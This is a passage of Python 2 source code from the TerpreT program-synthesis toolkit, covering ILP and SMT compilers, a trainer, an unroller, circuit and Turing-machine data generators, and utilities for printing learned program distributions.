# print "unhandled", ast.dump(ch)
return case_node
def print_switch_block_tree(body, level=0):
if isinstance(body, list):
for node in body:
if isinstance(node, SwitchGroup):
print level*4*" ", "// start group %s#%s" % (node.var_name, node.idx())
print_switch_block_tree(node.cases.values(), level=level)
print level*4*" ", "// end group %s#%s" % (node.var_name, node.idx())
elif isinstance(node, CaseNode):
print level*4*" ", "%s=%s:" % (node.var_name, node.val)
print_switch_block_tree(node.declarations, level=level+1)
print_switch_block_tree(node.factors, level=level+1)
print_switch_block_tree(node.switch_groups, level=level+1)
else:
print level*4*" ", node
else:
assert False
def decls_in_case_node(case_node):
results = case_node.declarations + []
for switch_group in case_node.switch_groups:
for child_case_node in switch_group.cases.values():
results.extend(decls_in_case_node(child_case_node))
return results
def active_vars(case_node):
factors = case_node.factors + []
decls = set([])
for factor in factors:
for decl in factor.scope():
decls.add(decl)
decls |= set(case_node.declarations)
for switch_group in case_node.switch_groups:
decls.add(case_node.resolve_variable(switch_group.var_name))
for child_case_node in switch_group.cases.values():
decls |= active_vars(child_case_node)
for switch_group in case_node.switch_groups:
for child_case_node in switch_group.cases.values():
decls -= set(child_case_node.declarations)
return decls
def declare_local_marginals(case_node):
vars = active_vars(case_node)
#local_marginals = case_node.make_local_marginals(vars)
case_node.make_local_marginals(vars)
#for var_name in local_marginals:
# marg_name = local_marginals[var_name]
# lpw.add_variable(marg_name, case_node.resolve_variable(var_name).size)
for var in vars:
kind = var.kind if case_node.context_str() == '' else 'Var'
lpw.add_variable(case_node.to_local_marginal(var), var.size, kind)
for switch_group in case_node.switch_groups:
for child_case_node in switch_group.cases.values():
declare_local_marginals(child_case_node)
def factors_in_case_node(case_node):
factors = case_node.factors + []
for factor in factors:
factor.resolve_variables()
for switch_group in case_node.switch_groups:
for child_case_node in switch_group.cases.values():
factors.extend(factors_in_case_node(child_case_node))
return factors
def used_vars_in_case_node(case_node):
factors = case_node.factors + []
vars = set([])
for factor in factors:
for var in factor.scope():
vars.add(var)
for switch_group in case_node.switch_groups:
for child_case_node in switch_group.cases.values():
vars |= used_vars_in_case_node(child_case_node)
return vars
def make_cross_level_constraints(case_node):
parent_mus = case_node.local_marginals
for switch_group in case_node.switch_groups:
for var in parent_mus:
children_mus = []
unused_vals = []
for child_case_node in switch_group.cases.values():
child_mus = child_case_node.local_marginals
if var in child_mus:
children_mus.append(child_mus[var])
else:
unused_vals.append(child_case_node.val)
if len(children_mus) > 0:
if len(unused_vals) > 0:
# Var is used in some children but not all. Need to handle unused cases.
# get gate marginal in parent context
switch_marg = case_node.get_local_marginal(switch_group.var_name)
# create ghost marginal
ghost_marginal = switch_group.ghost_local_marginal(var)
lpw.add_variable(ghost_marginal, case_node.resolve_variable(var).size)
children_mus.append(ghost_marginal)
entries = [
("+1", ghost_marginal, var),
("-1", switch_marg, "%s=[%s]" % (switch_group.var_name,
",".join([str(s + lpw.zero_one_index_offset())
for s in unused_vals])))
]
lpw.add_equality(entries, "0", n_eq=1)
# make cross-level consistency constraints
entries = [
("+1", parent_mus[var], "")
]
for child_mu in children_mus:
entries.append(("-1", child_mu, ""))
sz = case_node.resolve_variable(var).size
target = "np.zeros((%s))" % sz
lpw.add_equality(entries, target, n_eq=case_node.eval_constant(sz))
for switch_group in case_node.switch_groups:
for child_case_node in switch_group.cases.values():
make_cross_level_constraints(child_case_node)
def make_total_probability_constraints(case_node):
if case_node.is_global_case():
target_marginal = 1
for decl in case_node.declarations:
entries = [("+1", case_node.get_local_marginal(decl.name), decl.name)]
target = "1"
lpw.add_equality(entries, target, n_eq=1)
else:
target_marginal, target_value = case_node.gate_value_local_marginal_and_value()
target_value = case_node.eval_constant(target_value)
for var_name in case_node.local_marginals: #case_node.declarations:
decl = case_node.resolve_variable(var_name)
entries = [
("+1", case_node.local_marginals[decl.name], decl.name),
("-1", target_marginal, "%s=%s" % (case_node.var_name,
target_value + lpw.zero_one_index_offset()))
]
target = "0"
lpw.add_equality(entries, target, n_eq=1)
for switch_group in case_node.switch_groups:
for child_case_node in switch_group.cases.values():
make_total_probability_constraints(child_case_node)
def declare_factor_local_marginals(case_node):
for factor in case_node.factors:
if factor.is_observation(): continue
if factor.is_constant(): continue
if len(factor.scope()) <= 1: continue
lpw.add_variable(factor.local_marginal(),
",".join([str(decl.size) for decl in factor.scope()]))
for switch_group in case_node.switch_groups:
for child_case_node in switch_group.cases.values():
declare_factor_local_marginals(child_case_node)
def make_local_consistency_constraints(case_node):
for factor in case_node.factors:
if factor.is_observation(): continue
if factor.is_constant(): continue
if len(factor.scope()) <= 1: continue
for decl in factor.scope():
rest_of_scope_vars = [decl2.name for decl2 in factor.scope()]
rest_of_scope_vars = filter(lambda x: x != decl.name, rest_of_scope_vars)
entries = [("+1", factor.local_marginal(), ";".join(rest_of_scope_vars)),
("-1", case_node.local_marginals[decl.name], "")]
target = "np.zeros((%s))" % decl.size
lpw.add_equality(entries, target, n_eq=factor.context.eval_constant(decl.size))
for switch_group in case_node.switch_groups:
for child_case_node in switch_group.cases.values():
make_local_consistency_constraints(child_case_node)
def make_objective(case_node):
for factor in case_node.factors:
term1 = factor.local_marginal() #",".join(factor.scope_names())
if factor.is_observation() or factor.is_constant():
try:
observed_value = int(factor.arg_names[0])
#observed_value += lpw.zero_one_index_offset()
except ValueError:
assert False, "Can only observe integer values for now. Ask DT if you need this (it's easy-ish)."
term2 = "[%s] == %s" % (factor.var_name, observed_value)
else:
term2 = "[%s] == self.rt.%s(%s)" % (factor.var_name, factor.f,
",".join(objective_arg_strings(factor)))#["[%s]" % arg_name for arg_name in factor.arg_names]))
lpw.add_objective(term1, term2)
for switch_group in case_node.switch_groups:
for child_case_node in switch_group.cases.values():
make_objective(child_case_node)
def objective_arg_strings(factor):
obj_arg_strings = []
for arg_name in factor.arg_names:
# should allow named constants here too, ignore this for now
if isinstance(arg_name, basestring):
obj_arg_strings.append("[%s]" % arg_name)
else:
obj_arg_strings.append(str(arg_name))
return obj_arg_strings
def validate_tree(case_node):
for switch_group in case_node.switch_groups:
switch_group.validate()
for child_case_node in switch_group.cases.values():
validate_tree(child_case_node)
def make_mat_file(model_filename):
module_name = os.path.basename(model_filename).replace(".py", "")
module = imp.load_source(module_name, model_filename)
LP = module.makeLP()
LP.save_to_mat([None,model_filename.replace(".py", ".mat")])
def compile_ilp(model_filename, hypers_filename, data_filename,
train_batch, out_dir):
(parsed_model, data, hypers, out_name) = u.read_inputs(model_filename,
hypers_filename,
data_filename,
train_batch)
parsed_model = tptv1.translate_to_tptv1(parsed_model, data, hypers)
#print astunparse.unparse(parsed_model)
tree = unroller.unroll_and_flatten(parsed_model,
do_checks=False,
print_info=False)
print astunparse.unparse(tree)
global_case = make_case_node(tree.body, None, None)
# print "Declarations"
# global_decls = u.decls_in_case_node(global_case)
# for decl in global_decls:
# print decl
# print
# print "Resolving variable uses..."
factors = factors_in_case_node(global_case)
for factor in factors:
factor.resolve_variables()
declare_local_marginals(global_case)
declare_factor_local_marginals(global_case)
make_cross_level_constraints(global_case)
make_total_probability_constraints(global_case)
make_local_consistency_constraints(global_case)
make_objective(global_case)
for const in global_case.constants:
lpw.add_constant(const.name, const.value)
for rtf in global_case.runtime_functions:
lpw.add_runtime_function(rtf)
result_filename = os.path.join(out_dir, '%s.py' % make_matlab_filename(out_name))
with open(result_filename, 'w') as out_stream:
lpw.dump(out_stream)
make_mat_file(result_filename)
return
if __name__ == "__main__":
args = docopt(__doc__)
source_filename = args['MODEL']
hypers_filename = args['HYPERS']
data_filename = args['DATA']
out_dir = args.get('OUTDIR', None) or "compiled/ilp/"
out_dir = os.path.join(out_dir, "")
train_batch = args.get('--train-batch', 'train') or 'train'
try:
compile_ilp(source_filename, hypers_filename, data_filename,
train_batch, out_dir)
except:
type, value, tb = sys.exc_info()
traceback.print_exc()
pdb.post_mortem(tb)
```
#### File: TerpreT/bin/compile_smt.py
```python
import sys
import os
sys.path.append(os.path.join(os.path.dirname(__file__), "..", "lib"))
from docopt import docopt
import traceback
import pdb
import ast
import json
# If you are using Debian/Ubuntu packages, you'll need this:
from z3.z3 import IntVal, Solver, init
import config
init(config.LIB_Z3_PATH)
# If you have installed z3 locally, you will need something like this:
# from z3 import IntVal, Solver, init
# init('/path/to/local/installation/lib/libz3.so')
from terpret_z3 import ToZ3ConstraintsVisitor
import unroller
import utils as u
import tptv1
def compile_smt(model_filename, hypers_filename, data_filename,
train_batch, out_dir):
(parsed_model, data, hypers, out_name) = u.read_inputs(model_filename,
hypers_filename,
data_filename,
train_batch)
print ("Unrolling execution model.")
parsed_model = u.replace_hypers(parsed_model, hypers)
unrolled_parsed_model = unroller.unroll_and_flatten(parsed_model,
do_checks=False,
print_info=False)
input_dependents = tptv1.get_input_dependent_vars(unrolled_parsed_model)
idx = 1
constraints = []
z3compilers = []
for i in data['instances']:
print ("Generating SMT constraint for I/O example %i." % idx)
z3compiler = ToZ3ConstraintsVisitor(tag="__ex%i" % idx, variables_to_tag=input_dependents)
constraints.extend(z3compiler.visit(unrolled_parsed_model))
for var_name, vals in i.iteritems():
if vals is None:
pass
            elif isinstance(vals, list):
                # renamed from `i` to avoid shadowing the instance loop variable
                for item_idx, val in enumerate(vals):
                    if val is not None:
                        var_name_item = "%s_%s" % (var_name, item_idx)
constraints.append(
z3compiler.get_expr(var_name_item) == IntVal(val))
else:
constraints.append(
z3compiler.get_expr(var_name) == IntVal(vals))
z3compilers.append(z3compiler)
idx = idx + 1
# Unify things:
z3compiler = z3compilers[0]
for i in xrange(1, len(z3compilers)):
z3compilerP = z3compilers[i]
for param in z3compiler.get_params():
constraints.append(
z3compiler.get_expr(param) == z3compilerP.get_expr(param))
out_file_name = os.path.join(out_dir, out_name + ".smt2")
print "Writing SMTLIB2 benchmark info to '%s'." % out_file_name
if not os.path.isdir(out_dir):
os.makedirs(out_dir)
solver = Solver()
idx = 0
for c in constraints:
# Debugging helper if things unexpectedly end up UNSAT:
# solver.assert_and_track(c, "c%i" % idx)
solver.add(c)
idx = idx + 1
with open(out_file_name, 'w') as f:
f.write(solver.to_smt2())
f.write("(get-model)")
# Debugging helper if things unexpectedly end up UNSAT:
# print solver.check()
# core = solver.unsat_core()
# print "Size of unsat core: %i" % len(core)
# idx = 0
# for c in constraints:
# if Bool("c%i" % idx) in core:
# print "CORE: %s" % (constraints[idx])
# idx = idx + 1
if __name__ == "__main__":
args = docopt(__doc__)
source_filename = args['MODEL']
hypers_filename = args['HYPERS']
data_filename = args['DATA']
out_dir = args.get('OUTDIR', None) or "compiled/smt2_files/"
out_dir = os.path.join(out_dir, "")
train_batch = args.get('--train-batch', 'train') or 'train'
try:
compile_smt(source_filename, hypers_filename, data_filename,
train_batch, out_dir)
except:
type, value, tb = sys.exc_info()
traceback.print_exc()
pdb.post_mortem(tb)
```
#### File: TerpreT/bin/fp_train.py
```python
import sys, os
sys.path.append(os.path.join(os.path.dirname(__file__), "..", "lib"))
from docopt import docopt
import traceback
import pdb
import trainer
from custom_train import CustomTrainer
import train
import tensorflow as tf
class FPTrainer(CustomTrainer):
@staticmethod
def default_train_hypers():
return {
"optimizer": "rmsprop",
"num_epochs": 3000,
"stop_below_loss": 0.005,
"learning_rate": 0.1,
"learning_rate_decay": .9,
"momentum": 0.0,
"minibatch_size": -1,
"print_frequency": 100,
"gradientClipC2": 1.0,
"fGradientNoise": .01,
"fGradientNoiseGamma": .55,
"fEntropyBonusDecayRate": .5,
"dirichletInitScale": 2
}
def __init__(self, model, model_module, model_hypers, train_hypers, data,
seed=0, do_debug=False, make_log=False):
super(FPTrainer, self).__init__(model, model_module, model_hypers, train_hypers, data,
seed=seed, do_debug=do_debug, make_log=make_log)
if __name__ == "__main__":
args = docopt(__doc__)
test_batches = args.get('--test-batches', None)
if test_batches is not None:
args['--test-batch'] = test_batches.split(',')
try:
train.load_and_run(args, FPTrainer)
except:
if args.get('--debug', False):
type, value, tb = sys.exc_info()
traceback.print_exc()
pdb.post_mortem(tb)
else:
raise
```
#### File: TerpreT/bin/unroll.py
```python
import sys, os
sys.path.append(os.path.join(os.path.dirname(__file__), "..", "lib"))
from docopt import docopt
import ast
import astunparse
import copy
import error
from error import check_type
import pdb
import itertools
import traceback
import json
import utils as u
import unroller
def run(source_filename, hypers_filename=None):
source = open(source_filename, 'r').read()
if hypers_filename is None:
hypers_list = {"default": ""}
else:
with open(hypers_filename, 'r') as f:
hypers_list = json.load(f)
for hypers_name, hypers in hypers_list.iteritems():
module = ast.parse(source)
if hypers != "":
module = u.replace_hypers(module, hypers)
unrolled_node = unroller.unroll_and_flatten(module, do_checks=True)
print(astunparse.unparse(unrolled_node))
# Only do the first one...
break
return None
if __name__ == "__main__":
args = docopt(__doc__)
model_filename = args['MODEL']
hypers_filename = args.get('HYPERS', None)
try:
run(model_filename, hypers_filename=hypers_filename)
except:
type, value, tb = sys.exc_info()
traceback.print_exc()
pdb.post_mortem(tb)
```
#### File: data/generators/make_circuit_data.py
```python
from collections import defaultdict
from copy import copy
from docopt import docopt
import json
import numpy as np
import os
import pdb
import re
import sys
import traceback
HYPERS_RE = re.compile("W(\d+)_G(\d+)_O(\d+)")
def make_hypers(wire_num, gate_num, output_num):
return {'numWires': int(wire_num),
'numGates': int(gate_num),
'numOutputs': int(output_num)}
def get_hypers_name(hypers):
return "W%i_G%i_O%i" % (hypers['numWires'],
hypers['numGates'],
hypers['numOutputs'])
def get_hypers_from_string(hypers_name):
match = HYPERS_RE.match(hypers_name)
(wire_num, gate_num, output_num) = match.groups()
return make_hypers(wire_num, gate_num, output_num)
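# Round-trip example: make_hypers(4, 5, 3) is named "W4_G5_O3" by
# get_hypers_name, and get_hypers_from_string("W4_G5_O3") recovers the same dict.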
def make_shift_ex():
hypers = make_hypers(4, 5, 3)
instances = []
for n in xrange(8):
in_as_binary = "{0:03b}".format(n)
in_as_binary = [int(i) for i in in_as_binary]
out_as_binary = copy(in_as_binary)
if in_as_binary[0] == 1:
out_as_binary[1] = in_as_binary[2]
out_as_binary[2] = in_as_binary[1]
instances.append({'initial_wires': in_as_binary + [0],
'final_wires': out_as_binary})
return {'batch_name': "train",
'hypers': get_hypers_name(hypers),
'instances': instances}
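# The instances above encode a controlled swap: when the first input bit is 1,
# wires 1 and 2 are exchanged, otherwise the bits pass through (e.g. 101 -> 110).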
def make_adder_ex(num_wires, num_gates):
assert num_wires >= 3
hypers = make_hypers(num_wires, num_gates, 2)
instances = []
for n in xrange(8):
in_as_binary = [int(i) for i in "{0:03b}".format(n)]
out_as_dec = sum(x == 1 for x in in_as_binary)
out_as_binary = [int(i) for i in "{0:02b}".format(out_as_dec)]
instances.append({'initial_wires': in_as_binary + [0] * (num_wires - 3),
'final_wires': out_as_binary})
return {'batch_name': "train",
'hypers': get_hypers_name(hypers),
'instances': instances}
def make_full_adder_ex(num_examples, num_wires, num_gates, seed):
assert num_wires >= 4
hypers = make_hypers(num_wires, num_gates, 3)
instances = []
np.random.seed(seed)
for _ in xrange(num_examples):
num = np.random.randint(0, 16)
in_as_binary = [int(i) for i in "{0:04b}".format(num)]
a = 2 * in_as_binary[0] + in_as_binary[1]
b = 2 * in_as_binary[2] + in_as_binary[3]
res = a + b
out_as_binary = [int(i) for i in "{0:03b}".format(res)]
instances.append({'initial_wires': in_as_binary + [0] * (num_wires - 4),
'final_wires': out_as_binary})
return {'batch_name': "train",
'hypers': get_hypers_name(hypers),
'instances': instances}
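# Each instance encodes 2-bit addition: the four input bits hold two 2-bit
# numbers a and b, and final_wires is the 3-bit sum. E.g. num = 11 = 0b1011
# gives a = 2, b = 3 and final_wires = [1, 0, 1] (i.e. 5).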
def write_hypers(outdir, hypers):
if not(os.path.isdir(outdir)):
os.makedirs(outdir)
out_file = os.path.join(outdir, "circuit.hypers.json")
with open(out_file, 'w') as f:
json.dump({get_hypers_name(hypers): hypers for hypers in hypers}, f, indent=2)
def write_data(outdir, examples, name):
by_hypers = defaultdict(list)
for exampleset in examples:
by_hypers[exampleset['hypers']].append(exampleset)
if not(os.path.isdir(outdir)):
os.makedirs(outdir)
for (hypers_name, examplesetlist) in by_hypers.iteritems():
out_file = os.path.join(outdir, "circuit_%s_%s.data.json" % (name, hypers_name))
with open(out_file, 'w') as f:
json.dump(examplesetlist, f, indent=2)
if __name__ == "__main__":
args = docopt(__doc__)
outdir = args.get('OUTDIR', None) or '.'
seeds = [int(s) for s in args['--seeds'].split(",")]
wire_nums = [int(n) for n in args['--num-wires'].split(",")]
gate_nums = [int(n) for n in args['--num-gates'].split(",")]
example_num = int(args['--num-examples'])
shift_examples = []
adder_examples = []
full_adder_examples = []
try:
shift_examples.append(make_shift_ex())
for wire_num in wire_nums:
for gate_num in gate_nums:
adder_examples.append(make_adder_ex(wire_num, gate_num))
for seed in seeds:
full_adder_examples.append(make_full_adder_ex(example_num, wire_num, gate_num, seed))
hypers_names = set(ex['hypers']
for ex in shift_examples + adder_examples + full_adder_examples)
hypers_list = [get_hypers_from_string(hypers_name)
for hypers_name in hypers_names]
write_hypers(outdir, hypers_list)
write_data(outdir, shift_examples, "shift")
write_data(outdir, adder_examples, "adder")
write_data(outdir, full_adder_examples, "full_adder")
except:
type, value, tb = sys.exc_info()
traceback.print_exc()
pdb.post_mortem(tb)
```
#### File: data/generators/make_turing_data.py
```python
from collections import defaultdict
from docopt import docopt
import json
import numpy as np
import os
import pdb
import sys
import traceback
def get_batch_name(seed):
if seed == 0:
return "train"
else:
return "seed__%i" % seed
def get_hypers_name(hypers):
return "L%i_T%i_H%i_S%i" % (hypers['tapeLength'],
hypers['numTimesteps'],
hypers['numHeadStates'],
hypers['numTapeSymbols'])
def make_one_prepend_ex(hypers):
assert hypers['numTapeSymbols'] >= 2
data_len = np.random.randint(1, hypers['tapeLength'] - 1)
initial_blanks = [hypers['numTapeSymbols'] - 1] * (hypers['tapeLength'] - data_len - 1)
final_blanks = [hypers['numTapeSymbols'] - 1] * (hypers['tapeLength'] - data_len - 2)
initial_data = [np.random.randint(0, hypers['numTapeSymbols'] - 1)
for _ in range(data_len + 1)]
final_data = [0] + initial_data
return {'initial_tape': initial_data + initial_blanks,
'final_tape': final_data + final_blanks,
'final_is_halted': 1}
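# Example with tapeLength = 5 and numTapeSymbols = 3 (blank symbol 2):
# initial tape [1, 0, 2, 2, 2] maps to [0, 1, 0, 2, 2] -- a zero is prepended
# and the data shifts right, consuming one blank cell.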
def make_one_invert_ex(hypers):
assert hypers['numTapeSymbols'] == 3
data_len = np.random.randint(1, hypers['tapeLength'] - 1)
blanks = [2] * (hypers['tapeLength'] - data_len - 1)
initial_data = [np.random.randint(0, 2)
for _ in range(data_len + 1)]
final_data = [1 - c for c in initial_data]
return {'initial_tape': initial_data + blanks,
'final_tape': final_data + blanks,
'final_is_halted': 1}
def make_one_dec_ex(hypers):
assert hypers['numTapeSymbols'] == 3
num_bits = np.random.randint(1, hypers['tapeLength'])
blanks = [2] * (hypers['tapeLength'] - num_bits)
decimal_input = np.random.randint(2**(num_bits - 1), 2**num_bits)
binary_input = ("{0:0" + str(num_bits) + "b}").format(decimal_input)
binary_final = ("{0:0" + str(num_bits) + "b}").format(decimal_input - 1)
return {'initial_tape': [int(b) for b in binary_input] + blanks,
'final_tape': [int(b) for b in binary_final] + blanks,
'final_is_halted': 1}
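# Example with tapeLength = 5 and num_bits = 3: input 0b110 (6) on tape
# [1, 1, 0, 2, 2] decrements to 0b101 (5), i.e. final tape [1, 0, 1, 2, 2].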
def make_ex_data(hypers, seed, example_num, make_one_fun):
np.random.seed(seed)
instances = [make_one_fun(hypers) for _ in xrange(example_num)]
return {'batch_name': get_batch_name(seed),
'hypers': get_hypers_name(hypers),
'instances': instances}
def make_hypers(tape_len, symbol_num, state_num, timestep_num):
return {'tapeLength': tape_len,
'numTimesteps': timestep_num,
'numHeadStates': state_num,
'numTapeSymbols': symbol_num}
def write_hypers(outdir, hypers, name):
if not(os.path.isdir(outdir)):
os.makedirs(outdir)
out_file = os.path.join(outdir, "turing_%s_hypers.json" % name)
print out_file
with open(out_file, 'w') as f:
json.dump({get_hypers_name(hypers): hypers}, f, indent=2)
def write_data(outdir, examples, name):
by_hypers = defaultdict(list)
for exampleset in examples:
by_hypers[exampleset['hypers']].append(exampleset)
if not(os.path.isdir(outdir)):
os.makedirs(outdir)
for (hypers_name, examplesetlist) in by_hypers.iteritems():
out_file = os.path.join(outdir, "turing_%s_data.json" % (name))
print out_file
with open(out_file, 'w') as f:
json.dump(examplesetlist, f, indent=2)
if __name__ == "__main__":
args = docopt(__doc__)
outdir = args.get('OUTDIR', None) or '.'
seeds = [int(s) for s in args['--seeds'].split(",")]
tape_lengths = [int(l) for l in args['--tape-length'].split(",")]
symbol_nums = [int(n) for n in args['--num-tape-symbols'].split(",")]
state_nums = [int(n) for n in args['--num-head-states'].split(",")]
timestep_nums = [int(n) for n in args['--num-timesteps'].split(",")]
example_num = int(args['--num-examples'])
hypers_list = []
invert_examples = []
prepend_examples = []
decrement_examples = []
try:
hypers_dict = {
"invert": (5, 3, 2, 6), # invert
"prepend": (5, 3, 3, 6), # prepend zero
"decrement": (5, 3, 3, 9), # binary decrement
}
for name, hyper_values in hypers_dict.iteritems():
hypers = make_hypers(*hyper_values)
if name == "invert":
make_one_fn = make_one_invert_ex
elif name == "prepend":
make_one_fn = make_one_prepend_ex
elif name == "decrement":
make_one_fn = make_one_dec_ex
else:
assert False
for seed in seeds:
example = make_ex_data(hypers, seed, example_num, make_one_fn)
write_hypers(outdir, hypers, name)
write_data(outdir, [example], name)
except:
type, value, tb = sys.exc_info()
traceback.print_exc()
pdb.post_mortem(tb)
```
#### File: TerpreT/lib/error.py
```python
import ast
import sys
def error(msg, node):
'''
Print an error that includes line and column information.
'''
msg = '\n'.join([' ' + line for line in msg.split('\n')])
lineno = node.lineno if hasattr(node, 'lineno') else 0
col_offset = node.col_offset if hasattr(node, 'col_offset') else 0
print >> sys.stderr, "Error (line {}, col {}):\n{}\n".format(lineno, col_offset, msg)
def fatal_error(msg, node):
'''
Print an error message and then exit with a negative status.
'''
error(msg, node)
raise RuntimeError('Fatal error during compilation.')
def check_type(node, type_):
if not isinstance(node, type_):
msg = "Expected a {} but got a {}.\n{}".format(type_.__name__, type(node).__name__, ast.dump(node))
fatal_error(msg, node)
```
#### File: TerpreT/lib/fp_printer_utils.py
```python
import numpy as np
import re
def unit_dist(x):
return [(x, 1.0)]
def collapsed_dist_to_str(dist):
(x, _) = max(dist, key=lambda (_, p): p)
return str(x)
def pruned_dist_to_str(dist):
if len(dist) == 1:
return str(dist[0][0])
out = '['
for (i, (x, p)) in enumerate(dist):
out += '{}: {:03.3f}'.format(x, p)
if i < len(dist) - 1:
out += ', '
out += ']'
return out
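# e.g. pruned_dist_to_str([(1, 0.9), (2, 0.1)]) == '[1: 0.900, 2: 0.100]'
# and pruned_dist_to_str([('cons', 1.0)]) == 'cons'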
def dist_to_str(dist):
return pruned_dist_to_str(dist)
def get_for_ex(data_point, ex_id):
# If this is shared over all examples (e.g., stack[0]), it will have
# only one dim:
if data_point.ndim == 1:
return data_point
else:
return data_point[ex_id]
class ProbDataPrinter(object):
def __init__(self, par_prob_bound):
self.par_prob_bound = par_prob_bound
def name_dist(self, names, dist):
if self.par_prob_bound is None:
return [max(zip(names, dist), key=lambda x: x[1])]
else:
out = []
for (n, p) in zip(names, dist):
if p > self.par_prob_bound:
out.append((n, p))
return out
def func_dist(self, func, dist):
if isinstance(dist, np.float64):
return [(func(0), dist)]
if self.par_prob_bound is None:
(max_idx, max_prob) = max(enumerate(dist), key=lambda x: x[1])
return [(func(max_idx), max_prob)]
else:
out = []
for (i, p) in enumerate(dist):
if p > self.par_prob_bound:
out.append((func(i), p))
return out
def get_combinator(self, dist):
return self.name_dist(['foldli', 'mapi', 'zipWithi'], dist)
def get_looptype(self, dist):
return self.name_dist(['foreach', 'foreachZip'], dist)
def get_cmb_instruction(self, dist):
names = ['cons', 'car', 'cdr', 'nil', 'add', 'inc', 'eq', 'gt', 'and',
'ite', 'one', 'noop', 'dec', 'or']
return self.name_dist(names, dist)
def get_asm_instruction(self, dist):
names = ['cons', 'car', 'cdr', 'nil', 'add', 'inc', 'eq', 'gt', 'and',
'one', 'noop', 'dec', 'or', 'jz', 'jnz', 'return']
return self.name_dist(names, dist)
def get_register(self, dist, prefix="r", shift=0):
return self.func_dist(lambda i: '{}{}'.format(prefix, i + shift), dist)
def register_dist_to_string(self, dist, prefix="r"):
return dist_to_str(self.get_register(dist, prefix))
def assembly_loop_register_dist_to_string(self, num_registers):
def go(dist):
# Like register_dist_to_string, but with renaming:
arg_dist = []
for (arg_idx, prob) in self.get_register(dist, prefix=""):
arg_idx = int(arg_idx)
if arg_idx < num_registers:
name = "r%i" % arg_idx
elif arg_idx == num_registers:
name = "ele1"
elif arg_idx == num_registers + 1:
name = "ele2"
else:
raise Exception("Unhandled register.")
arg_dist.append((name, prob))
return dist_to_str(arg_dist)
return go
def closure_mutable_register_dist_to_string(self, num_inputs, extra_register_num):
def go(dist):
# Like register_dist_to_string, but with renaming:
arg_dist = []
for (arg_idx, prob) in self.get_register(dist, prefix=""):
arg_idx = int(arg_idx)
if arg_idx < num_inputs + extra_register_num:
name = "r%i" % arg_idx
elif arg_idx == num_inputs + extra_register_num:
name = "ele"
elif arg_idx == num_inputs + extra_register_num + 1:
name = "acc"
elif arg_idx == num_inputs + extra_register_num + 2:
name = "idx"
arg_dist.append((name, prob))
return dist_to_str(arg_dist)
return go
def closure_register_dist_to_string(self, num_inputs, prefix_length, closure_stmt_idx):
def go(dist):
# Like register_dist_to_string, but with renaming:
arg_dist = []
for (arg_idx, prob) in self.get_register(dist, prefix=""):
arg_idx = int(arg_idx)
if arg_idx < num_inputs + prefix_length:
name = "r%i" % arg_idx
elif arg_idx < num_inputs + prefix_length + closure_stmt_idx:
name = "c%i" % (arg_idx - (num_inputs + prefix_length))
elif arg_idx == num_inputs + prefix_length + closure_stmt_idx:
name = "ele"
elif arg_idx == num_inputs + prefix_length + closure_stmt_idx + 1:
name = "acc"
elif arg_idx == num_inputs + prefix_length + closure_stmt_idx + 2:
name = "idx"
arg_dist.append((name, prob))
return dist_to_str(arg_dist)
return go
def get_value(self, dist):
return self.func_dist(lambda i: '{}'.format(i), dist)
class StackPrinter(object):
def __init__(self, prog_printer):
self.prog_printer = prog_printer
def str_for_var(self, var, ex_id):
return dist_to_str(self.prog_printer.data_printer.get_value(get_for_ex(self.prog_printer.var_data[var], ex_id)))
def get_stack_cell(self, ptr, ex_id):
return (self.str_for_var("stackCarVal_%i" % (ptr), ex_id),
self.str_for_var("stackCdrVal_%i" % (ptr), ex_id))
def run(self, ex_id):
print('Stack:')
for ptr in range(1, self.prog_printer.stack_size):
args = (ptr,) + self.get_stack_cell(ptr, ex_id)
print(" stack[%i] = (Int %s, Ptr %s)" % args)
class RegisterPrinter(object):
def __init__(self, prog_printer):
self.prog_printer = prog_printer
def str_for_var(self, var, ex_id):
return dist_to_str(self.prog_printer.data_printer.get_value(get_for_ex(self.prog_printer.var_data[var], ex_id)))
class ImmutableRegisterPrinter(RegisterPrinter):
def __init__(self, prog_printer):
super(ImmutableRegisterPrinter, self).__init__(prog_printer)
def print_reg(self, reg_name_template, ex_id):
raise NotImplementedError()
def run(self, ex_id):
print('Registers:')
# Inputs + prefix registers:
for reg_idx in range(self.prog_printer.input_num +
self.prog_printer.prefix_length):
self.print_reg("reg%%sVal_%i" % reg_idx, ex_id)
# Lambda registers:
for loop_step in range(self.prog_printer.max_loop_steps):
list_over = self.str_for_var("listIsOver_%i" % loop_step, ex_id)
print(" listIsOver[%i] = %s" % (loop_step, list_over))
if list_over != '1':
for reg_idx in range(self.prog_printer.lambda_length):
self.print_reg("lambdaReg%%sVal_%i_%i" % (loop_step,
reg_idx),
ex_id)
# Combinator result + suffix registers:
prefix_reg_num = self.prog_printer.input_num + self.prog_printer.prefix_length
for reg_idx in range(1 + self.prog_printer.suffix_length):
self.print_reg("reg%%sVal_%i" % (prefix_reg_num + reg_idx), ex_id)
class TypedImmutableRegisterPrinter(ImmutableRegisterPrinter):
def __init__(self, prog_printer):
super(TypedImmutableRegisterPrinter, self).__init__(prog_printer)
def print_reg(self, reg_name_template, ex_id):
reg_name = re.sub(r'_(\d+)', r'[\1]', reg_name_template % '')
args = (reg_name,
self.str_for_var(reg_name_template % 'Ptr', ex_id),
self.str_for_var(reg_name_template % 'Int', ex_id),
self.str_for_var(reg_name_template % 'Bool', ex_id))
print(" %s = (Ptr %s, Int %s, Bool %s)" % args)
class UntypedImmutableRegisterPrinter(ImmutableRegisterPrinter):
def __init__(self, prog_printer):
super(UntypedImmutableRegisterPrinter, self).__init__(prog_printer)
def print_reg(self, reg_name_template, ex_id):
reg_name = re.sub(r'_(\d+)', r'[\1]', reg_name_template % '')
args = (reg_name,
self.str_for_var(reg_name_template % (''), ex_id))
print(" %s = %s" % args)
class MutableRegisterPrinter(RegisterPrinter):
def __init__(self, prog_printer):
super(MutableRegisterPrinter, self).__init__(prog_printer)
self.num_timesteps = self.prog_printer.prefix_length + \
(1 + self.prog_printer.lambda_length) * self.prog_printer.max_loop_steps + \
self.prog_printer.suffix_length + 2
self.num_registers = self.prog_printer.input_num + self.prog_printer.hypers['extraRegisterNum']
def run(self, ex_id):
for t in range(self.num_timesteps):
if t == 0:
loop_iter = None
print('Registers (t = %d), initial:' % (t))
elif t <= self.prog_printer.prefix_length:
loop_iter = None
print('Registers (t = %d), prefix:' % (t))
elif t <= self.prog_printer.prefix_length + (self.prog_printer.lambda_length + 1) * self.prog_printer.max_loop_steps:
loop_iter = (t - self.prog_printer.prefix_length - 1) / (self.prog_printer.lambda_length + 1)
print('Registers (t = %d), loop iter %i:' % (t, loop_iter))
else:
print('Registers (t = %d), suffix:' % (t))
